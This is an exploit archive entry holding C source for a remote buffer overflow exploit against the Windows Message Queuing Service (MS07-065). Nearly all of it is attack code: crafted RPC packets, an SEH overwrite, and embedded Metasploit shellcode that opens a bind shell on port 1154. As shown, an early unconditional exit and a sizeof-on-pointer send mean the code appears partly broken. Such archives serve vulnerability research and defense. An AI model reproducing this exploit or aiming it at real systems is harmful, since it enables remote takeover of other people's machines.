Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)

EDB-ID:

4934


Platform:

Windows

Published:

2008-01-18

/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) 
Mod of axis's code.

CHANGELOG

- added dnsname as a parameter, before it was hardcoded in the 
  request data. (Marcin Kozlowski)

Provided for legal security research and testing purposes ONLY

Go through the code  :) 
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")

// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
  0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
  0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
  0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
  0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
  0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
};


char *request_1;


// RPC Request  Opnum: 0x06 
char request_1a[] = {
  0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
  0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
  0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00
};


char *request_1b;


char request_1c[] = {
  0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,	// \xeb\x06\x42\x42 jmpcode
  0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,	//  overwrite seh ; call ebx
  0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,	//  bindshell on port 1154, metasploit shellcode
  0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
  0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
  0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
  0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
  0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
  0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
  0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
  0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
  0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
  0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
  0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
  0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
  0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
  0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
  0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
  0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
  0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
  0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
  0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
  0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
  0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
  0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
  0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
  0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
  0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
  0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
  0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
  0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
  0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
  0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
  0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
  0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
  0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
  0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
  0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
  0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
  0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
  0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
  0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
  0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
  0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
  0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};


char request_2[] = {
  0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
  0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
  0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
  0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};



void
usage (char *argv)
{
  printf (" Usage:   %s -h 127.0.0.1 (Universal exploit)\n", argv);
  printf ("          %s -h host -n dnsname [-p port]\n", argv);
  exit (1);
}



/************* TCP connect *************************/

void Disconnect (SOCKET s);


// ripped from isno
int
Make_Connection (char *address, int port, int timeout)
{
  struct sockaddr_in target;
  SOCKET s;
  int i;
  DWORD bf;
  fd_set wd;
  struct timeval tv;

  s = socket (AF_INET, SOCK_STREAM, 0);
  if (s < 0)
    return -1;

  target.sin_family = AF_INET;
  target.sin_addr.s_addr = inet_addr (address);
  if (target.sin_addr.s_addr == 0)
    {
      closesocket (s);
      return -2;
    }
  target.sin_port = htons ((short) port);
  bf = 1;
  ioctlsocket (s, FIONBIO, &bf);
  tv.tv_sec = timeout;
  tv.tv_usec = 0;
  FD_ZERO (&wd);
  FD_SET (s, &wd);
  connect (s, (struct sockaddr *) &target, sizeof (target));
  if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
    {
      closesocket (s);
      return -3;
    }
  if (i == 0)
    {
      closesocket (s);
      return -4;
    }
  i = sizeof (int);
  getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
  if ((bf != 0) || (i != sizeof (int)))
    {
      closesocket (s);
      return -5;
    }
  ioctlsocket (s, FIONBIO, &bf);
  return s;
}


void
Disconnect (SOCKET s)
{
  closesocket (s);
  WSACleanup ();
}




/****************************************************/



int
main (int argc, char *argv[])
{

  unsigned char *target = NULL;
  unsigned char *name = NULL;
  int port = 2103;

  int i, j, len, len2;

  int ret;
  char buffer[6000] = { 0 };
  SOCKET s;
  WSADATA WSAData;

  printf("--------------------------------------------------------------------------\n");
  printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
  printf("-== code by axis@ph4nt0m ==-\n");
  printf("-== Http://www.ph4nt0m.org ==-\n");
  printf("-== Tested against Windows 2000 server SP4 ==-\n");
  printf
    ("--------------------------------------------------------------------------\n\n");

  if (argc < 5)
    usage (argv[0]);		//Handle parameters
  for (i = 1; i < argc; i++)
    {
      if ((argv[i][0] == '-'))
	{
	  switch (argv[i][1])
	    {
	    case 'h':
	      target = (unsigned char *) argv[i + 1];
	      break;
	    case 'p':
	      if (strcmp (argv[i + 1], "2103") == 0)
		{
		  printf ("[+] Attacking default port 2103\n");
		}
	      else
		{
		  port = atoi (argv[i + 1]);
		}
	      break;
	    case 'n':
	      name = (unsigned char *) argv[i + 1];
	      break;
	    default:
	      printf ("[-] Invalid argument: %s\n", argv[i]);
	      usage (argv[0]);
	      break;
	    }
	  i++;
	}
      else
	usage (argv[0]);
    }


  request_1b = malloc (sizeof (char) * (strlen (name) * 2));

  if (request_1b == NULL)
    {
      printf ("Allocation Error\n");
      exit (1);
    }


  strcpy (request_1b, name);


  for (i = 0, j = 0; j < (strlen (name) * 2); j++)
    {
      if (!(j % 2))
	{
	  *(request_1b + j) = *(name + i);
	}
      else
	{
	  *(request_1b + j) = '\x00';
	  i++;
	}
    }





/********************** attack payload ***************************/
  if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
    {
      fprintf (stderr, "[-] WSAStartup failed.\n");
      WSACleanup ();
      exit (1);
    }


  Sleep (1200);


  s = Make_Connection ((char *) target, port, 10);
  if (s < 0)
    {
      fprintf (stderr, "[-] connect err.\n");
      exit (1);
    }

  //Send our evil Payload              
  printf ("[*]Sending our Payload, Good Luck! ^_^\n");

  printf ("[*]Sending RPC Bind String!\n");

  send (s, bind_str, sizeof (bind_str), 0);


  Sleep (1000);

  printf ("[*]Sending RPC Request Now!\n");

  len = 56 + (strlen (name) * 2) + 640;

  request_1 = calloc (len, sizeof (char));

  if (request_1 == NULL)
  {
    printf ("Allocation Error\n");
    exit (1);
  }

  memcpy (request_1, request_1a, 56);
  memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
  memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);


  exit(1);

  memset (buffer, '\x41', sizeof (buffer));	// fil the buffer to trigger seh
  send (s, request_1, sizeof (request_1), 0);
  send (s, buffer, 5104, 0);	// fil the buffer to trigger seh
  send (s, request_2, sizeof (request_2), 0);


  Sleep (100);

  memset (buffer, 0, sizeof (buffer));
  ret = recv (s, buffer, sizeof (buffer) - 1, 0);
  //printf("recv: %s\n", buffer);

  Disconnect (s);

  return 0;
}

// milw0rm.com [2008-01-18]